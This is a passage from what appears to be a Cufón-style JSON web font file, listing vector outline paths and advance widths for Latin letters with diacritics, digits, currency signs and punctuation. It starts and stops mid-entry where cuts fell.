,-43,-22,-74,-22v-20,0,-47,11,-31,27v39,17,117,10,114,71v-1,30,-20,49,-45,59v11,63,-39,90,-100,74r0,-35","w":213},{"d":"157,20r-38,54r-38,0r25,-54r51,0xm238,-211r-82,0r0,211r-67,0r0,-211r-82,0r0,-51r231,0r0,51","w":245},{"d":"35,-197v-7,-73,57,-86,123,-75r0,45v-28,-5,-69,-13,-62,30r49,0r0,42r-47,0r0,155r-63,0r0,-155r-27,0r0,-42r27,0","w":152},{"d":"161,69r-117,0r0,-343r117,0r0,43r-62,0r0,258r62,0r0,42","w":195},{"d":"200,0r-185,0r0,-41r104,-110r-100,0r0,-46r179,0r0,39r-102,111r104,0r0,47xm179,-295r0,4r-62,65r-43,0r44,-69r61,0","w":214},{"d":"209,-295r-56,69r-45,0r-56,-69r46,0r33,40r32,-40r46,0xm93,-176v42,-43,135,-35,135,48r0,128r-63,0r0,-98v-1,-29,-2,-56,-35,-54v-15,1,-25,5,-37,12r0,140r-63,0r0,-197r63,0r0,21","w":256},{"d":"204,-295r-56,69r-44,0r-57,-69r47,0r32,40r32,-40r46,0xm79,-87v1,62,104,55,135,25r7,0r0,51v-83,35,-206,16,-206,-87v0,-67,46,-106,113,-106v71,0,101,42,96,117r-145,0xm161,-124v5,-40,-43,-49,-69,-31v-8,6,-12,17,-13,31r82,0","w":239},{"d":"147,-317v20,0,29,-14,28,-36r39,0v9,65,-78,85,-118,50v-12,-11,-17,-28,-17,-50r39,0v0,23,8,36,29,36xm146,-44v35,0,49,-18,49,-54r0,-164r68,0r0,167v0,68,-45,100,-117,100v-72,0,-117,-31,-116,-100r0,-167r68,0r0,164v-1,36,14,53,48,54","w":292},{"d":"153,-91r-134,0r0,-51r134,0r0,51","w":172},{"d":"247,-262r-87,144r0,8r55,0r0,38r-55,0r0,14r55,0r0,38r-55,0r0,20r-65,0r0,-20r-55,0r0,-38r55,0r0,-14r-55,0r0,-38r56,0r0,-8r-87,-144r74,0r46,94r47,-94r71,0"},{"d":"123,-155r-28,22r0,133r-63,0r0,-97r-28,23r0,-41r28,-22r0,-137r63,0r0,101r28,-23r0,41","w":126},{"d":"275,0r-70,0r-18,-53r-97,0r-18,53r-68,0r97,-262r78,0xm171,-101r-32,-94r-32,94r64,0xm182,-292r-43,0r-62,-65r0,-4r61,0","w":279},{"d":"131,-291r-65,0r0,-48r65,0r0,48xm175,0r-153,0r0,-46r43,0r0,-169r-43,0r0,-47r153,0r0,47r-43,0r0,169r43,0r0,46","w":196},{"d":"178,-236v26,29,50,64,50,120v0,72,-35,122,-107,122v-63,0,-106,-35,-106,-97v0,-73,75,-108,142,-80v-6,-16,-19,-32,-31,-44r-59,23r-14,-31r45,-17v-15,-11,-31,-23,-48,-29r0,-5r80,0r20,14r40,-17r13,31xm123,-38v38,0,43,-44,39,-87v-27,-25,-85,-16,-81,33v2,30,12,54,42,54","w":244},{"d":"122,-216v-5,-31,-61,-8,-80,-3r0,-37v39,-16,131,-21,132,31v1,23,-17,33,-31,41v19,4,34,16,35,38v4,60,-94,58,-139,41r0,-38v22,6,80,28,88,-6v0,-22,-33,-15,-55,-16r0,-35v21,-1,54,6,50,-16","w":215},{"d":"49,-239v23,-1,43,-3,46,-23r42,0r0,129r36,0r0,34r-122,0r0,-34r38,0r0,-74r-40,0r0,-32","w":215},{"d":"93,0r-63,0r0,-197r63,0r0,197xm95,-226r-67,0r0,-48r67,0r0,48xm107,24v37,8,62,6,62,-42r0,-137r-37,0r0,-42r100,0r0,201v5,64,-65,80,-125,66r0,-46xm232,-226r-67,0r0,-48r67,0r0,48","w":261},{"d":"185,-144v29,14,54,32,54,71v0,52,-52,80,-111,79v-62,-1,-111,-20,-111,-77v0,-36,23,-47,52,-62v-26,-12,-44,-31,-45,-64v-1,-92,208,-97,208,-5v0,30,-21,47,-47,58xm151,-158v24,-20,19,-69,-23,-65v-26,-3,-46,20,-31,41v13,10,34,17,54,24xm131,-39v28,0,53,-26,34,-50v-8,-11,-45,-23,-61,-28v-33,20,-22,78,27,78"},{"d":"143,20r-38,54r-37,0r24,-54r51,0xm118,-161v-20,0,-47,11,-31,27v39,17,114,10,114,71v0,76,-126,80,-184,53r0,-52v26,8,47,25,83,25v24,0,48,-11,31,-27v-44,-14,-114,-13,-113,-73v2,-70,116,-78,174,-52r0,50v-23,-7,-43,-22,-74,-22","w":213},{"d":"278,-113r-57,0r-68,-100r-62,101r-56,0r96,-150r44,0","w":312},{"d":"245,-360r-47,69r-38,0r31,-69r54,0xm171,-360r-47,69r-39,0r32,-69r54,0xm153,-267v84,0,135,52,135,136v0,82,-51,136,-135,136v-84,0,-135,-54,-135,-136v0,-84,51,-136,135,-136xm153,-44v47,0,65,-38,65,-87v0,-50,-19,-87,-65,-87v-47,0,-65,38,-65,87v0,50,18,87,65,87","w":306},{"d":"247,-262r-87,144r0,8r55,0r0,38r-55,0r0,14r55,0r0,38r-55,0r0,20r-65,0r0,-20r-55,0r0,-38r55,0r0,-14r-55,0r0,-38r56,0r0,-8r-87,-144r74,0r46,94r47,-94r71,0"},{"d":"214,-291r-46,0r-33,-39r-32,39r-46,0r57,-69r44,0xm140,-218v-31,0,-65,18,-42,41v52,23,145,17,145,95v0,96,-151,103,-224,67r0,-63r8,0v24,19,58,32,96,34v30,2,65,-15,43,-41v-52,-27,-147,-17,-145,-99v3,-87,139,-97,212,-65r0,60r-8,0v-20,-15,-51,-29,-85,-29"},{"d":"223,0r-190,0r0,-262r190,0r0,51r-122,0r0,45r113,0r0,51r-113,0r0,64r122,0r0,51","w":245},{"d":"156,-264v12,1,14,-10,15,-20r38,0v-2,36,-15,58,-50,58v-23,0,-32,-18,-52,-20v-13,-1,-15,8,-15,21r-39,0v1,-32,19,-58,50,-58v24,1,33,17,53,19xm126,-46v12,-1,28,-5,37,-11r0,-140r64,0r0,197r-64,0r0,-22v-40,45,-135,35,-135,-47r0,-128r64,0r0,98v0,32,2,55,34,53","w":256},{"d":"160,-315v36,7,54,63,23,87r92,228r-70,0r-21,-53r-92,0r-20,53r-68,0r92,-228v-28,-22,-14,-79,19,-85r33,-47r59,0r0,4xm168,-101r-29,-76r-31,76r60,0xm140,-241v14,0,24,-12,24,-25v1,-14,-10,-26,-24,-26v-14,0,-25,12,-24,26v0,13,10,25,24,25","w":279},{"d":"314,-134r-34,0r0,-100r-4,0r-31,70r-24,0r-32,-71r-4,0r0,101r-33,0r0,-128r56,0r25,62r27,-62r54,0r0,128xm132,-234r-36,0r0,100r-35,0r0,-100r-36,0r0,-28r107,0r0,28","w":346},{"d":"144,-236v21,-1,57,7,72,13r0,51v-24,-5,-42,-18,-72,-18r0,44v48,10,92,19,92,71v0,45,-44,73,-92,75r0,63r-30,0r0,-62v-25,0,-68,-7,-86,-16r0,-52v29,5,53,21,87,21r0,-48v-43,-12,-93,-17,-91,-75v2,-43,43,-63,90,-67r0,-41r30,0r0,41xm117,-190v-19,0,-42,17,-25,33v4,3,13,6,25,8r0,-41xm144,-47v22,1,39,-26,18,-37v-6,-3,-12,-5,-18,-6r0,43"},{"d":"127,-106v2,25,-17,44,-30,56r136,0r0,50r-206,0r0,-49v29,-9,36,-21,37,-57r-31,0r0,-38r31,0v-10,-78,24,-123,94,-123v27,0,47,4,65,9r0,54v-35,-15,-95,-29,-96,25r0,35r77,0r0,38r-77,0"},{"d":"194,-237r-141,0r0,-37r141,0r0,37xm124,-204v66,0,108,41,108,105v0,64,-42,105,-108,105v-67,0,-109,-40,-109,-105v0,-66,42,-105,109,-105xm124,-38v33,0,42,-24,42,-60v0,-35,-9,-60,-42,-61v-35,0,-43,26,-43,61v0,35,9,60,43,60","w":247},{"d":"271,0r-65,0r-111,-180r0,180r-62,0r0,-262r81,0r96,150r0,-150r61,0r0,262xm75,35v32,11,70,8,61,-39r39,0v11,63,-39,90,-100,74r0,-35","w":304},{"d":"221,-295r-47,69r-39,0r32,-69r54,0xm146,-295r-47,69r-38,0r31,-69r54,0xm126,-46v12,-1,28,-5,37,-11r0,-140r64,0r0,197r-64,0r0,-22v-40,45,-135,35,-135,-47r0,-128r64,0r0,98v0,32,2,55,34,53","w":256},{"d":"9,35v29,10,69,9,61,-35r-40,0r0,-274r63,0r0,270r16,0v11,63,-39,90,-100,74r0,-35","w":123},{"d":"264,-262r-97,161r0,101r-67,0r0,-98r-98,-164r76,0r57,102r54,-102r75,0xm190,-361r0,4r-62,65r-43,0r44,-69r61,0","w":265},{"d":"185,-291r-46,0r-32,-39r-33,39r-46,0r57,-69r44,0xm7,-54v35,10,95,18,95,-29r0,-131r-60,0r0,-48r128,0r0,185v1,79,-87,90,-163,76r0,-53","w":199},{"d":"242,-60r-36,0r0,61r-64,0r0,-61r-127,0r0,-50r122,-152r69,0r0,154r36,0r0,48xm142,-108r0,-95r-77,95r77,0"},{"d":"95,-274v39,47,67,96,67,173v0,77,-28,127,-67,173r-66,0r0,-5v41,-38,75,-89,75,-168v0,-77,-34,-129,-75,-167r0,-6r66,0","w":195},{"d":"93,0r-63,0r0,-197r63,0r0,197xm62,-249v19,-1,24,-18,24,-39r32,0v9,60,-65,86,-99,49v-10,-10,-14,-28,-14,-49r33,0v1,22,3,39,24,39","w":123},{"d":"283,-291r-47,0r-32,-39r-33,39r-45,0r56,-69r44,0xm395,-262r-71,262r-75,0r-47,-171r-45,171r-75,0r-70,-262r70,0r40,180r49,-180r67,0r46,180r42,-180r69,0","w":406},{"d":"18,-131v0,-87,59,-131,154,-131r213,0r0,51r-122,0r0,45r114,0r0,51r-114,0r0,64r122,0r0,51r-206,0v-97,2,-161,-38,-161,-131xm88,-131v0,62,40,87,108,82r0,-164v-67,-5,-108,20,-108,82","w":408},{"d":"24,-184v-1,-87,105,-80,196,-78r0,326r-35,0r0,-294r-27,0r0,294r-37,0r0,-168v-58,-2,-96,-26,-97,-80"},{"d":"128,-262v95,-1,153,42,153,131v0,88,-60,133,-155,131r-93,0r0,-119r-28,0r0,-41r28,0r0,-102r95,0xm101,-49v72,5,110,-18,110,-82v0,-64,-39,-87,-110,-82r0,53r56,0r0,41r-56,0r0,70","w":298},{"d":"272,-5r-51,0r0,-93r-183,0r0,-47r234,0r0,140","w":312},{"d":"16,-104v0,-81,78,-121,142,-85r2,-8r62,0r0,174v9,101,-101,108,-185,89r0,-49v45,11,128,30,122,-40v-15,11,-32,21,-57,20v-59,0,-86,-38,-86,-101xm81,-102v0,52,46,61,78,40r0,-90v-41,-15,-78,5,-78,50xm182,-295r-40,69r-62,0v15,-27,41,-45,59,-69r43,0","w":251},{"d":"105,-128r-65,0r0,-69r65,0r0,69xm105,0r-65,0r0,-69r65,0r0,69","w":144},{"d":"239,0r-73,0r-56,-86r-17,21r0,65r-63,0r0,-274r63,0r0,164r68,-87r73,0r-71,85xm51,35v32,11,70,8,61,-39r39,0v11,63,-39,90,-100,74r0,-35","w":241},{"d":"237,69v-55,14,-111,-4,-98,-69r-106,0r0,-262r190,0r0,51r-122,0r0,45r113,0r0,51r-113,0r0,64r122,0r0,51r-46,0v-11,38,31,47,60,34r0,35","w":245},{"d":"35,-237v23,0,45,-5,47,-25r43,0r0,164r-49,0r0,-107r-41,0r0,-32xm297,-263r-138,263r-47,0r138,-263r47,0xm398,-35r-30,0r0,35r-46,0r0,-35r-83,0r0,-46r81,-85r48,0r0,99r30,0r0,32xm323,-67r0,-60r-57,60r57,0","w":425},{"d":"79,-62v-1,36,56,28,70,10r0,-41v-28,5,-68,0,-70,31xm137,-299v44,8,51,87,5,98v42,6,70,20,70,67r0,134r-63,0r0,-21v-33,41,-137,33,-134,-36v3,-68,73,-66,135,-74v-7,-48,-85,-22,-118,-15r0,-47v18,-4,38,-8,62,-9v-39,-13,-41,-84,2,-95r33,-51r59,0r0,4xm119,-222v14,0,24,-12,24,-25v1,-14,-11,-27,-24,-27v-13,0,-25,13,-24,27v0,13,10,25,24,25","w":240},{"d":"93,-168v25,-20,42,-33,80,-29r0,60v-28,-3,-58,-5,-80,5r0,132r-63,0r0,-197r63,0r0,29","w":178},{"d":"100,-43v48,25,83,-30,64,-88xm150,-152v-50,-31,-87,28,-66,89xm232,-99v5,85,-86,127,-162,94r-24,33r-31,0r35,-46v-21,-16,-35,-45,-35,-81v0,-88,91,-127,165,-92r21,-29r31,0r-32,42v18,18,30,44,32,79xm186,-295r0,4r-62,65r-43,0r44,-69r61,0","w":247},{"d":"93,0r-63,0r0,-197r63,0r0,197xm115,-237r-107,0r0,-37r107,0r0,37","w":123},{"d":"212,-291r-46,0r-33,-39r-32,39r-46,0r57,-69r44,0xm264,-262r-97,161r0,101r-67,0r0,-98r-98,-164r76,0r57,102r54,-102r75,0","w":265},{"d":"93,0r-63,0r0,-197r63,0r0,197","w":123},{"d":"164,-86v-4,-52,-83,-33,-125,-28r0,-148r186,0r0,50r-123,0r0,43v71,-5,130,11,130,80v0,99,-128,109,-203,79r0,-58v28,5,46,24,78,22v29,-2,60,-7,57,-40"},{"d":"175,0r-153,0r0,-46r43,0r0,-169r-43,0r0,-47r153,0r0,47r-43,0r0,169r43,0r0,46xm169,-302r-141,0r0,-37r141,0r0,37","w":196},{"d":"169,-41v24,-2,31,-20,54,-23r0,52v-13,5,-35,13,-54,14r0,61r-30,0r0,-60v-64,-5,-106,-36,-106,-103v0,-69,43,-98,106,-104r0,-55r30,0r0,56v19,1,42,8,54,14r0,52v-21,-2,-30,-22,-54,-23r0,119xm140,-160v-39,4,-56,67,-32,100v8,10,19,16,32,19r0,-119"},{"d":"93,0r-63,0r0,-274r63,0r0,274","w":123},{"d":"114,-56v49,35,113,-8,105,-75v-2,-18,-4,-40,-9,-53xm191,-207v-51,-33,-104,8,-104,76v0,21,3,39,9,53xm288,-131v7,111,-112,166,-207,120r-27,36r-36,0r40,-53v-24,-23,-40,-57,-40,-103v0,-112,112,-165,206,-120r21,-29r37,0r-34,46v24,22,37,58,40,103xm215,-361r0,4r-62,65r-43,0r44,-69r61,0","w":306},{"d":"198,-302r-141,0r0,-37r141,0r0,37xm223,0r-190,0r0,-262r190,0r0,51r-122,0r0,45r113,0r0,51r-113,0r0,64r122,0r0,51","w":245},{"d":"101,-143v41,0,79,2,79,-39v0,-37,-42,-32,-79,-32r0,71xm250,-190v0,43,-22,63,-52,78r87,112r-82,0r-71,-96r-31,0r0,96r-68,0r0,-262v93,4,215,-22,217,72","w":281},{"d":"153,-44v47,0,65,-38,65,-87v0,-50,-19,-87,-65,-87v-47,0,-65,38,-65,87v0,50,18,87,65,87xm206,-3v-3,43,48,32,77,25r0,47v-62,15,-144,4,-141,-64v-76,-4,-124,-56,-124,-136v0,-84,51,-136,135,-136v84,0,136,52,135,136v0,64,-31,113,-82,128","w":306},{"d":"146,-44v35,0,49,-18,49,-54r0,-164r68,0r0,167v0,68,-45,100,-117,100v-72,0,-117,-31,-116,-100r0,-167r68,0r0,164v-1,36,14,53,48,54xm197,-361r0,4r-62,65r-43,0r44,-69r61,0","w":292},{"d":"234,-360r-56,69r-44,0r-57,-69r47,0r32,40r33,-40r45,0xm271,0r-65,0r-111,-180r0,180r-62,0r0,-262r81,0r96,150r0,-150r61,0r0,262","w":304},{"d":"175,0r-153,0r0,-46r43,0r0,-169r-43,0r0,-47r153,0r0,47r-43,0r0,169r43,0r0,46xm171,-292r-52,0r0,-48r52,0r0,48xm77,-292r-52,0r0,-48r52,0r0,48","w":196},{"d":"79,-87v1,62,104,55,135,25r7,0r0,51v-83,35,-206,16,-206,-87v0,-67,46,-106,113,-106v71,0,101,42,96,117r-145,0xm161,-124v5,-40,-43,-49,-69,-31v-8,6,-12,17,-13,31r82,0","w":239},{"d":"223,-360r-57,69r-44,0r-56,-69r46,0r33,40r32,-40r46,0xm128,-262v95,-1,153,42,153,131v0,88,-60,133,-155,131r-93,0r0,-262r95,0xm101,-49v72,5,110,-18,110,-82v0,-64,-39,-87,-110,-82r0,164","w":298},{"d":"222,0r-189,0r0,-262r68,0r0,211r121,0r0,51xm227,-274r-51,104r-41,0r27,-104r65,0","w":229},{"d":"238,-360r-47,69r-39,0r32,-69r54,0xm163,-360r-47,69r-38,0r31,-69r54,0xm146,-44v35,0,49,-18,49,-54r0,-164r68,0r0,167v0,68,-45,100,-117,100v-72,0,-117,-31,-116,-100r0,-167r68,0r0,164v-1,36,14,53,48,54","w":292},{"d":"257,-226r-46,0r-33,-38r-32,38r-46,0r57,-69r44,0xm345,-197r-61,197r-68,0r-40,-133r-39,133r-68,0r-61,-197r66,0r34,136r42,-136r56,0r40,136r34,-136r65,0","w":352},{"d":"207,-226r-47,0r-32,-38r-33,38r-45,0r56,-69r44,0xm16,-104v0,-81,78,-121,142,-85r2,-8r62,0r0,174v9,101,-101,108,-185,89r0,-49v45,11,128,30,122,-40v-15,11,-32,21,-57,20v-59,0,-86,-38,-86,-101xm81,-102v0,52,46,61,78,40r0,-90v-41,-15,-78,5,-78,50","w":251},{"d":"211,-291r-46,0r-33,-39r-32,39r-46,0r57,-69r44,0xm93,-176v42,-43,135,-35,135,48r0,128r-63,0r0,-98v-1,-29,-2,-56,-35,-54v-15,1,-25,5,-37,12r0,140r-63,0r0,-274r63,0r0,98","w":256},{"d":"175,0r-153,0r0,-46r43,0r0,-169r-43,0r0,-47r153,0r0,47r-43,0r0,169r43,0r0,46xm99,-317v20,0,28,-14,28,-36r40,0v8,64,-81,86,-119,49v-11,-12,-17,-28,-17,-49r39,0v0,23,9,36,29,36","w":196},{"d":"160,-291r-65,0r0,-48r65,0r0,48xm236,0r-220,0r0,-49r130,-162r-124,0r0,-51r207,0r0,50r-131,161r138,0r0,51","w":249},{"d":"118,-252v20,0,30,-14,29,-36r39,0v9,65,-78,85,-118,50v-12,-11,-18,-28,-18,-50r40,0v0,22,7,36,28,36xm79,-62v-1,36,56,28,70,10r0,-41v-28,5,-68,0,-70,31xm150,-130v-6,-50,-85,-23,-118,-16r0,-47v65,-15,180,-24,180,59r0,134r-63,0r0,-21v-33,41,-138,33,-134,-36v4,-67,70,-68,135,-73","w":240},{"d":"-10,24v37,8,62,6,62,-42r0,-137r-37,0r0,-42r100,0r0,201v5,64,-65,80,-125,66r0,-46xm135,-226r-42,0r-25,-37r-25,37r-42,0r45,-69r45,0","w":145},{"d":"153,-317v20,0,29,-14,29,-36r39,0v8,64,-79,85,-118,50v-12,-11,-18,-28,-18,-50r39,0v0,23,8,36,29,36xm153,-267v84,0,135,52,135,136v0,82,-51,136,-135,136v-84,0,-135,-54,-135,-136v0,-84,51,-136,135,-136xm153,-44v47,0,65,-38,65,-87v0,-50,-19,-87,-65,-87v-47,0,-65,38,-65,87v0,50,18,87,65,87","w":306},{"d":"100,35v27,10,69,8,60,-30v-88,1,-142,-50,-142,-136v0,-84,58,-137,145,-136v42,1,68,7,101,23r0,62v-33,-9,-49,-37,-93,-36v-54,1,-83,33,-83,86v0,65,39,93,108,89r0,-52r-52,0r0,-49r121,0r0,129v-19,7,-42,13,-65,17v10,59,-42,83,-100,68r0,-35","w":291},{"d":"225,-291r-47,0r-32,-39r-32,39r-46,0r56,-69r44,0xm146,-44v35,0,49,-18,49,-54r0,-164r68,0r0,167v0,68,-45,100,-117,100v-72,0,-117,-31,-116,-100r0,-167r68,0r0,164v-1,36,14,53,48,54","w":292},{"d":"288,-123v3,-38,-46,-32,-65,-17r0,140r-64,0r0,-123v3,-38,-47,-32,-66,-17r0,140r-63,0r0,-197r63,0r0,21v29,-33,104,-38,122,7v21,-17,42,-32,72,-34v91,-3,61,119,66,203r-64,0","w":380},{"d":"271,1r-235,-97r0,-40r235,-98r0,50r-165,68r165,67r0,50","w":312},{"d":"16,-97v0,-83,75,-130,142,-92r2,-8r62,0r0,269r-63,0r0,-91v-18,14,-35,23,-64,24v-53,1,-79,-46,-79,-102xm81,-98v-8,53,45,67,78,44r0,-97v-41,-17,-82,6,-78,53","w":251},{"d":"93,-176v42,-43,135,-35,135,48r0,128r-63,0r0,-98v-1,-29,-2,-56,-35,-54v-15,1,-25,5,-37,12r0,140r-63,0r0,-197r63,0r0,21xm193,-295r0,4r-62,65r-43,0r44,-69r61,0","w":256},{"d":"153,-267v84,0,135,52,135,136v0,82,-51,136,-135,136v-84,0,-135,-54,-135,-136v0,-84,51,-136,135,-136xm153,-44v47,0,65,-38,65,-87v0,-50,-19,-87,-65,-87v-47,0,-65,38,-65,87v0,50,18,87,65,87","w":306},{"d":"126,-46v12,-1,28,-5,37,-11r0,-140r64,0r0,197r-64,0r0,-22v-40,45,-135,35,-135,-47r0,-128r64,0r0,98v0,32,2,55,34,53xm185,-295r0,4r-62,65r-43,0r44,-69r61,0","w":256},{"d":"158,-203v55,0,78,43,78,102v0,79,-76,132,-143,91r-2,10r-61,0r0,-274r63,0r0,97v19,-14,35,-26,65,-26xm93,-45v43,13,82,-7,78,-55v8,-53,-44,-66,-78,-44r0,99","w":251},{"d":"101,-222v80,-3,148,6,148,82v0,77,-63,100,-148,94r0,46r-68,0r0,-262r68,0r0,40xm101,-95v43,1,81,0,79,-43v-1,-37,-40,-37,-79,-35r0,78","w":264},{"d":"202,-143v32,5,55,27,55,63v-1,100,-125,78,-224,80r0,-262v85,5,204,-24,207,61v2,30,-20,45,-38,58xm101,-158v34,-1,71,4,70,-30v-1,-31,-36,-25,-70,-26r0,56xm101,-48v40,0,86,6,86,-33v0,-41,-46,-31,-86,-32r0,65","w":274},{"d":"222,0r-189,0r0,-262r68,0r0,211r121,0r0,51xm215,-103r-66,0r0,-69r66,0r0,69","w":229},{"d":"128,-252v20,0,29,-14,29,-36r39,0v8,64,-78,85,-118,50v-12,-11,-18,-28,-18,-50r39,0v0,23,8,36,29,36xm126,-46v12,-1,28,-5,37,-11r0,-140r64,0r0,197r-64,0r0,-22v-40,45,-135,35,-135,-47r0,-128r64,0r0,98v0,32,2,55,34,53","w":256},{"d":"217,-302r-141,0r0,-37r141,0r0,37xm146,-44v35,0,49,-18,49,-54r0,-164r68,0r0,167v0,68,-45,100,-117,100v-72,0,-117,-31,-116,-100r0,-167r68,0r0,164v-1,36,14,53,48,54","w":292},{"d":"171,-329v12,1,14,-10,15,-21r38,0v-2,36,-15,58,-50,58v-23,0,-32,-20,-52,-20v-12,0,-15,8,-15,21r-39,0v1,-32,19,-58,50,-58v24,0,33,18,53,20xm146,-44v35,0,49,-18,49,-54r0,-164r68,0r0,167v0,68,-45,100,-117,100v-72,0,-117,-31,-116,-100r0,-167r68,0r0,164v-1,36,14,53,48,54","w":292},{"d":"276,-252v13,44,-4,90,-49,88r0,164r-64,0r0,-22v-40,45,-135,35,-135,-47r0,-128r64,0r0,98v0,32,2,55,34,53v12,-1,28,-5,37,-11r0,-140v33,-2,80,10,79,-26v0,-10,-6,-20,-7,-29r41,0","w":267},{"d":"92,-101v0,79,34,130,74,168r0,5r-66,0v-39,-46,-66,-95,-66,-173v0,-77,27,-126,66,-173r66,0r0,6v-40,38,-74,89,-74,167","w":195},{"d":"93,-176v42,-43,135,-35,135,48r0,128r-63,0r0,-98v-1,-29,-2,-56,-35,-54v-15,1,-25,5,-37,12r0,140r-63,0r0,-217r-23,0r0,-37r23,0r0,-20r63,0r0,20r57,0r0,37r-57,0r0,41","w":256},{"d":"224,-302r-141,0r0,-37r141,0r0,37xm153,-267v84,0,135,52,135,136v0,82,-51,136,-135,136v-84,0,-135,-54,-135,-136v0,-84,51,-136,135,-136xm153,-44v47,0,65,-38,65,-87v0,-50,-19,-87,-65,-87v-47,0,-65,38,-65,87v0,50,18,87,65,87","w":306},{"d":"148,-130v-4,-51,-83,-23,-116,-16r0,-47v43,-11,124,-18,155,9v17,-11,42,-20,69,-20v71,0,101,42,96,117r-143,0v0,64,102,54,132,25r7,0r0,51v-50,25,-140,21,-176,-16v-22,15,-47,32,-90,32v-39,0,-67,-26,-67,-62v0,-67,68,-68,133,-73xm289,-124v4,-38,-41,-50,-67,-31v-8,6,-12,17,-13,31r80,0xm79,-62v0,38,59,26,75,8v-5,-12,-7,-25,-7,-38v-31,3,-68,1,-68,30xm262,-295r0,4r-62,65r-43,0r44,-69r61,0","w":366},{"d":"200,-10v-76,35,-185,8,-185,-88v0,-97,108,-126,185,-89r0,54v-26,-3,-34,-25,-67,-25v-35,0,-52,25,-52,60v0,67,82,71,110,34r9,0r0,54xm186,-295r0,4r-62,65r-43,0r44,-69r61,0","w":211},{"d":"278,0r-83,0r-78,-105r-16,19r0,86r-68,0r0,-262r68,0r0,119r93,-119r79,0r-103,121","w":277},{"d":"108,-215r-71,0r0,-47r71,0r0,47xm109,0r-73,0r8,-186r57,0","w":144},{"d":"181,-291r-65,0r0,-48r65,0r0,48xm244,-17v-27,12,-51,22,-92,22v-85,-2,-134,-49,-134,-136v0,-87,50,-136,134,-136v38,0,68,9,92,22r0,63r-7,0v-20,-14,-40,-35,-75,-34v-51,1,-74,34,-74,86v0,53,25,85,75,85v33,0,56,-19,74,-35r7,0r0,63","w":260},{"d":"211,-167v49,66,9,173,-87,173v-67,0,-109,-40,-109,-105v0,-81,74,-122,152,-98v25,2,44,-2,44,-26v0,-11,-5,-20,-6,-29r41,0v11,37,0,83,-35,85xm124,-38v33,0,42,-24,42,-60v0,-35,-9,-60,-42,-61v-35,0,-43,26,-43,61v0,35,9,60,43,60","w":247},{"d":"240,-17v-80,46,-211,18,-218,-76r-22,0v5,-9,2,-26,19,-23v0,-10,-2,-22,0,-31r-19,0r8,-24r14,0v13,-58,58,-96,127,-96v40,0,64,9,91,22r0,63r-7,0v-29,-41,-123,-48,-139,11r52,0r-8,24r-49,0v0,10,-2,22,0,31r37,0r-8,23r-24,0v8,26,32,49,66,48v32,-1,57,-16,73,-35r7,0r0,63"},{"d":"278,0r-83,0r-78,-105r-16,19r0,86r-68,0r0,-262r68,0r0,119r93,-119r79,0r-103,121xm69,35v32,11,70,8,61,-39r39,0v11,63,-39,90,-100,74r0,-35","w":277},{"d":"93,0r-63,0r0,-197r63,0r0,197xm125,-226r-42,0r-22,-37r-22,37r-41,0r41,-69r45,0","w":123},{"d":"79,-87v1,62,104,55,135,25r7,0r0,51v-20,7,-38,13,-61,15v-9,36,33,42,61,30r0,35v-53,13,-110,-3,-99,-64v-65,-3,-106,-38,-107,-103v0,-67,46,-106,113,-106v71,0,101,42,96,117r-145,0xm161,-124v5,-40,-43,-49,-69,-31v-8,6,-12,17,-13,31r82,0","w":239},{"d":"395,-262r-71,262r-75,0r-47,-171r-45,171r-75,0r-70,-262r70,0r40,180r49,-180r67,0r46,180r42,-180r69,0","w":406},{"d":"79,-87v1,62,104,55,135,25r7,0r0,51v-83,35,-206,16,-206,-87v0,-67,46,-106,113,-106v71,0,101,42,96,117r-145,0xm161,-124v5,-40,-43,-49,-69,-31v-8,6,-12,17,-13,31r82,0xm197,-226r-52,0r0,-48r52,0r0,48xm103,-226r-52,0r0,-48r52,0r0,48","w":239},{"d":"200,-10v-76,35,-185,8,-185,-88v0,-97,108,-126,185,-89r0,54v-26,-3,-34,-25,-67,-25v-35,0,-52,25,-52,60v0,67,82,71,110,34r9,0r0,54","w":211},{"d":"106,-267v41,0,74,32,74,73v0,40,-34,74,-74,74v-41,0,-74,-33,-74,-74v0,-41,33,-73,74,-73xm106,-159v19,0,34,-16,34,-35v0,-19,-16,-35,-34,-35v-18,0,-34,16,-34,35v0,19,16,35,34,35","w":211},{"d":"155,-264v12,1,14,-10,15,-20r38,0v-2,36,-15,58,-50,58v-23,0,-32,-18,-52,-20v-13,-1,-15,8,-15,21r-39,0v1,-32,19,-58,50,-58v24,1,33,17,53,19xm93,-176v42,-43,135,-35,135,48r0,128r-63,0r0,-98v-1,-29,-2,-56,-35,-54v-15,1,-25,5,-37,12r0,140r-63,0r0,-197r63,0r0,21","w":256},{"d":"227,-360r-56,69r-44,0r-57,-69r47,0r32,40r32,-40r46,0xm244,-17v-27,12,-51,22,-92,22v-85,-2,-134,-49,-134,-136v0,-87,50,-136,134,-136v38,0,68,9,92,22r0,63r-7,0v-20,-14,-40,-35,-75,-34v-51,1,-74,34,-74,86v0,53,25,85,75,85v33,0,56,-19,74,-35r7,0r0,63","w":260},{"d":"126,-46v12,-1,28,-5,37,-11r0,-140r64,0r0,197r-64,0r0,-22v-40,45,-135,35,-135,-47r0,-128r64,0r0,98v0,32,2,55,34,53","w":256},{"d":"271,0r-78,0r-57,-86r-57,86r-75,0r93,-132r-91,-130r78,0r55,82r56,-82r74,0r-91,128","w":274},{"d":"124,-267v76,0,106,45,108,121v3,114,-76,168,-192,147r0,-52v53,18,123,4,124,-54v-55,37,-146,14,-146,-67v0,-56,46,-95,106,-95xm86,-175v-3,42,46,49,79,36v1,-43,-2,-84,-41,-84v-26,0,-37,21,-38,48"},{"d":"140,-317v20,0,29,-14,28,-36r40,0v8,64,-79,85,-118,50v-12,-11,-18,-28,-18,-50r39,0v0,23,8,36,29,36xm275,0r-70,0r-18,-53r-97,0r-18,53r-68,0r97,-262r78,0xm171,-101r-32,-94r-32,94r64,0","w":279},{"d":"97,-82v-7,43,27,48,59,37r0,43v-55,13,-130,9,-122,-60r0,-20r-25,0r0,-38r25,0r0,-35r-26,0r0,-42r26,0r0,-57r63,0r0,57r59,0r0,42r-59,0r0,35r40,0r0,38r-40,0","w":164},{"d":"194,-226r-46,0r-33,-38r-32,38r-46,0r57,-69r44,0xm79,-62v-1,36,56,28,70,10r0,-41v-28,5,-68,0,-70,31xm150,-130v-6,-50,-85,-23,-118,-16r0,-47v65,-15,180,-24,180,59r0,134r-63,0r0,-21v-33,41,-138,33,-134,-36v4,-67,70,-68,135,-73","w":240},{"d":"105,-128r-65,0r0,-69r65,0r0,69xm116,-69r-63,134r-39,0r34,-134r68,0","w":144},{"d":"285,-159r-55,0r-14,55r50,0r0,42r-60,0r-16,62r-43,0r16,-62r-46,0r-16,62r-43,0r16,-62r-48,0